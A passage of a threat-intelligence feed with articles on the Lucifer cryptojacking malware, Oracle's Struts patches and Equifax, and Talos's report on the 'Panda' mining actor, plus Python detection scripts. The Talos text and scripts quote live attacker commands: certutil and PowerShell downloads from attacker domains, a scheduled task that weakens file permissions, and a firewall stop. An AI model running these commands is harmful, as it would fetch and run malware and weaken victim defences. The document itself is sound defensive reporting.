post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). 
\u201cApplying the updates and patches to the affected software is strongly advised.\u201d\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), the Laravel framework ([CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the malware connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collect interface info and send the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. 
If either port is open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (the full list of passwords used can be found in Unit 42\u2019s analysis). Upon successful authentication, it copies the malware binary to the remote host and runs it.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is exposed, Lucifer fires several leaked exploits and backdoor implants: [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>) and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>).\n\nOnce these three exploits have been used, the certutil utility is used to propagate the malware. Certutil.exe is a legitimate command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates; here it is abused as a living-off-the-land tool to propagate the malware.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. 
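The propagation chain described above (a credential spray against tcp/1433 and tcp/135, then certutil used to bring the binary onto the newly reached host) is straightforward to spot in host and network telemetry. What follows is an added detection example written for this section; it is not code from Unit 42's report nor from the malware. It runs two checks over a small set of constructed events (the event schema, host names and addresses are assumptions) and correlates them per host. The certutil switches it looks for, -urlcache, -verifyctl and -decode, are the common living-off-the-land download and decode modes of that tool; treating them as the shape of the downloader step is an assumption of this example, not a detail taken from the report.

```python
from collections import Counter

# Constructed sample telemetry for this example (not data from Unit 42's report).
# Field names, hosts and addresses are assumptions: auth_fail events come from the
# MSSQL and RPC listeners, process events from endpoint process-creation logging.
SAMPLE_EVENTS = [
    {'ts': 1, 'type': 'auth_fail', 'src': '203.0.113.9', 'dst': 'srv01', 'dst_port': 1433, 'user': 'sa'},
    {'ts': 2, 'type': 'auth_fail', 'src': '203.0.113.9', 'dst': 'srv01', 'dst_port': 1433, 'user': 'sa'},
    {'ts': 3, 'type': 'auth_fail', 'src': '203.0.113.9', 'dst': 'srv01', 'dst_port': 1433, 'user': 'sa'},
    {'ts': 4, 'type': 'auth_fail', 'src': '203.0.113.9', 'dst': 'srv01', 'dst_port': 1433, 'user': 'sa'},
    {'ts': 5, 'type': 'auth_fail', 'src': '203.0.113.9', 'dst': 'srv01', 'dst_port': 1433, 'user': 'sa'},
    {'ts': 6, 'type': 'auth_fail', 'src': '203.0.113.9', 'dst': 'srv01', 'dst_port': 1433, 'user': 'sa'},
    {'ts': 7, 'type': 'auth_fail', 'src': '203.0.113.9', 'dst': 'srv01', 'dst_port': 135, 'user': 'administrator'},
    {'ts': 8, 'type': 'auth_fail', 'src': '192.0.2.5', 'dst': 'srv01', 'dst_port': 1433, 'user': 'sa'},
    {'ts': 9, 'type': 'auth_fail', 'src': '192.0.2.5', 'dst': 'srv01', 'dst_port': 22, 'user': 'root'},
    {'ts': 20, 'type': 'process', 'host': 'srv01',
     'cmd': 'certutil.exe -urlcache -split -f http://198.51.100.7/spread.exe spread.exe'},
    {'ts': 21, 'type': 'process', 'host': 'srv01', 'cmd': 'CertUtil -verify cert.cer'},
    {'ts': 22, 'type': 'process', 'host': 'srv02', 'cmd': 'certutil -decode stage.b64 spread.exe'},
]

SPRAY_PORTS = {1433, 135}   # the two ports Lucifer probes before brute-forcing
SPRAY_THRESHOLD = 5         # failed logons per (source, target, port) before alerting
# certutil modes commonly abused to download or unpack a payload (assumption, see lead-in)
CERTUTIL_ABUSE_FLAGS = ('-urlcache', '-verifyctl', '-decode')


def find_password_spray(events, threshold=SPRAY_THRESHOLD):
    # Count failed logons per (source, target host, port) on the sprayed ports and
    # return only the tuples that reached the threshold, with their counts.
    counts = Counter()
    for ev in events:
        if ev['type'] == 'auth_fail' and ev['dst_port'] in SPRAY_PORTS:
            counts[(ev['src'], ev['dst'], ev['dst_port'])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


def is_certutil_abuse(cmd):
    # True when the command runs certutil with a download/decode switch or a URL argument.
    tokens = cmd.lower().split()
    if not tokens:
        return False
    # chr(92) is the backslash; normalise both path separators before taking the basename
    exe = tokens[0].replace(chr(92), '/').rsplit('/', 1)[-1]
    if exe not in ('certutil', 'certutil.exe'):
        return False
    has_flag = any(t in CERTUTIL_ABUSE_FLAGS for t in tokens[1:])
    has_url = any(t.startswith(('http://', 'https://')) for t in tokens[1:])
    return has_flag or has_url


def find_certutil_abuse(events):
    # (host, command line) for every process event that matches is_certutil_abuse.
    return [(ev['host'], ev['cmd'])
            for ev in events if ev['type'] == 'process' and is_certutil_abuse(ev['cmd'])]


def correlate(events, threshold=SPRAY_THRESHOLD):
    # Hosts that were both sprayed on 1433/135 and then ran certutil as a downloader:
    # the sequence the article describes for a successful Lucifer hop.
    sprayed = {dst for (_src, dst, _port) in find_password_spray(events, threshold)}
    staged = {host for host, _cmd in find_certutil_abuse(events)}
    return sorted(sprayed & staged)


if __name__ == '__main__':
    print('password spray:', find_password_spray(SAMPLE_EVENTS))
    print('certutil abuse:', find_certutil_abuse(SAMPLE_EVENTS))
    print('likely Lucifer hop onto:', correlate(SAMPLE_EVENTS))
```

Running the module reports the one source that crossed the threshold against srv01 on tcp/1433, the two certutil invocations that look like staging (the plain -verify call is ignored), and srv01 as the host where both signals meet. The threshold and the port set are the knobs to tune for a real environment; the SMB exploitation path (tcp/445) the article also mentions is not modelled here and would need its own signal.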
Researchers say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:28:33", "description": "Late last week, Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system.\n\nThe Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built with the Struts framework and its REST plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\nScores of Oracle products, roughly two dozen in total, are affected by the vulnerability. Multiple versions of Oracle\u2019s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. 
A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).\n\nOracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.\n\n> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>\n> \n> \u2014 US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)\n\nOracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month\u2019s advisory without delay.\n\nEquifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nThe credit bureau\u2019s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in wake of the breach. 
In his stead, the company said Paulino do Rego Barros Jr., who previously served as president of the company\u2019s Asia-Pacific division, will assume the role of interim chief executive.\n\nPrior to announcing the news, trading of Equifax shares was halted Tuesday morning.\n\nThe CEO will forgo his 2017 bonus, according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing, Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith\u2019s benefits until its Board of Directors completes its independent review of the breach.\n\n\u201cThe cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,\u201d Smith said in a statement Tuesday.\n\n\u201cOur interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry. The Board of Directors has absolute confidence in his ability to guide the company through this transition,\u201d Mark Feidler, the Board\u2019s non-executive chairman, said.\n\nSmith\u2019s departure comes a week after the company announced that its chief information officer, David Webb, and chief security officer, Susan Mauldin, would also be retiring.\n\nDespite retiring, Smith is, according to reports, still on track to testify before the Senate Banking Committee next week, on Oct. 4.\n\nSmith will likely get an earful from senators next week, including Mark Warner (D-VA). 
On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a \u201ctravesty.\u201d\n\n\u201cWe have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I\u2019m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it\u2019s cybersecurity.\u201d Warner said.\n\n\u201cI think Equifax is a travesty. I think the resignation of the CEO is by no means enough\u2026 Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability \u2013 they had known for months, and if they had simply put a patch in place we might have precluded this\u2026 I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.\u201d\n", "cvss3": {}, "published": "2017-09-26T14:28:26", "type": "threatpost", "title": "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7672", "CVE-2017-9787", "CVE-2017-9791", "CVE-2017-9793", "CVE-2017-9804", "CVE-2017-9805"], "modified": "2017-09-26T14:28:26", "id": "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "href": "https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit 
cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it has still been one of the most active attackers in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, the tooling that lets them move laterally through networks, and their use of RATs mean that organizations worldwide are at risk of having their system resources misused for mining or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again that they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromise and proofs of concept. Our threat traps show that Panda uses exploits leaked by the Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications and IT services industries were affected in these campaigns. 
\n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used masscan to look for a variety of vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Post-exploit, they used PowerShell to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple numeric filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as from kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. 
In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in and, similarly, save it under another simple numeric filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\" (MpsSvc is the Windows Firewall service). The malware also modifies the access control list to grant full access to certain files by running cacls.exe. \n \nFor example, the following scheduled task runs every minute as SYSTEM and grants Everyone full control of the dropped binary: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. 
\n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. 
Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saves it under a high-entropy filename, e.g. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to the Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\", where the ping to localhost serves only as a delay before launch. \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure: previously observed samples acquired the victim's internal IP and reached out to 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning, whereas 
this sample installs WinPcap and the open-source tool Masscan and scans for open ports on public IP addresses, saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445, saving the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously used tools, launching Mimikatz to collect victim passwords. \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. 
The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and the older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda had added another set of domains to their inventory of C2 and payload-hosting infrastructure. In line with their previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB\" instead of under a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools, which include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. 
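The command lines quoted in the Bulehero and later sections above (the firewall service stop, the cacls ACL change, the minute-interval scheduled task running as SYSTEM, the certutil download, the ping-based delay, and the 15-letters-plus-digits drop name in the Temp folder) are the parts of this activity a detection engineer can key on. The following is an added example, not Talos tooling and not code from the Panda samples: it runs one regex per TTP over constructed process-creation command lines modelled on the quoted commands (hostnames refanged, file names reused from the post, plus benign look-alikes), and escalates a host when two or more distinct TTPs fire. The rule names, the two-rule threshold and the sample log are this example's own assumptions.

```python
"""Hunt Windows process-creation command lines for the Panda TTPs quoted
above.  Added example, not Talos tooling; SAMPLE_LOG is constructed from
the commands in the write-up plus benign look-alikes."""
import re

# One regex per TTP.  Each generalises the literal command from the post
# (icacls as well as cacls, any drop path, any ping count, either slash).
RULES = [
    # "cmd /c net stop MpsSvc": the Windows Firewall service is stopped
    ("firewall_service_stop",
     re.compile(r"\bnet1?(?:\.exe)?\s+stop\s+MpsSvc\b", re.I)),
    # "cacls <file> /p everyone:F": ACL replaced with Everyone:Full Control
    ("acl_weakening_everyone_full",
     re.compile(r"\b(?:cacls|icacls)(?:\.exe)?\s+\S+\s+/p\s+everyone:F\b", re.I)),
    # scheduled task every minute as SYSTEM ("/sc minute ... /ru system")
    ("schtasks_minute_as_system",
     re.compile(r"\bschtasks(?:\.exe)?\s+/create\b.*?/sc\s+minute\b.*?/ru\s+system\b", re.I)),
    # certutil as a downloader ("-urlcache -split -f http...")
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*?-urlcache\b.*?-split\b.*?-f\s+https?://", re.I)),
    # "ping 127.0.0.1 -n 5 & Start <miner>": ping used as a sleep before launch
    ("ping_delay_then_start",
     re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d+\s*&\s*start\b", re.I)),
    # 15 lower-case letters + 4-5 digits dropped in \Windows\Temp
    # (autzipmfvidixxr7407.exe and xblzcdsafdmqslz19595.exe in the post)
    ("random_temp_payload_name",
     re.compile(r"[\\/]Windows[\\/]Temp[\\/][a-z]{15}\d{4,5}\.exe\b", re.I)),
]

# Constructed Sysmon-style CommandLine values (hostnames refanged).
SAMPLE_LOG = [
    r"cmd /c net stop MpsSvc",
    r'cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F"',
    r"certutil.exe -urlcache -split -f http://fid.hognoob.se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe",
    r"cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\wercplshost.exe",
    r"powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://wiu.fxxxxxxk.me/download.exe','C:\Windows\Temp\xblzcdsafdmqslz19595.exe')",
    # benign look-alikes that must stay quiet
    r"certutil -hashfile C:\Users\ops\installer.msi SHA256",
    r"ping 10.0.0.5 -n 2",
    r"schtasks /query /fo LIST",
]


def scan_command_lines(lines):
    """(rule_name, line) for every rule that fires; a line may fire several."""
    return [(name, line) for line in lines for name, rx in RULES if rx.search(line)]


def summarize(lines):
    """Hit count per rule, including rules that never fired."""
    counts = {name: 0 for name, _ in RULES}
    for name, _ in scan_command_lines(lines):
        counts[name] += 1
    return counts


def is_panda_like(lines, min_rules=2):
    """One rule alone (a lone certutil download) is a lead; two or more distinct
    TTPs on the same host is the escalation threshold chosen for this example."""
    return len({name for name, _ in scan_command_lines(lines)}) >= min_rules


if __name__ == "__main__":
    for name, line in scan_command_lines(SAMPLE_LOG):
        print(f"[{name}] {line}")
    print("escalate:", is_panda_like(SAMPLE_LOG))
```

The regexes are deliberately anchored on the abused switches (`-urlcache -split -f`, `/p everyone:F`, `/sc minute ... /ru system`) rather than on file names, because Panda rotates file and host names between campaigns while the commands stay the same; the three benign lines show that a bare certutil, ping or schtasks invocation does not fire.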
\n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Download counts from the HFS instances used by Panda show that this malware had a wide reach, and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profit depends on when they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. 
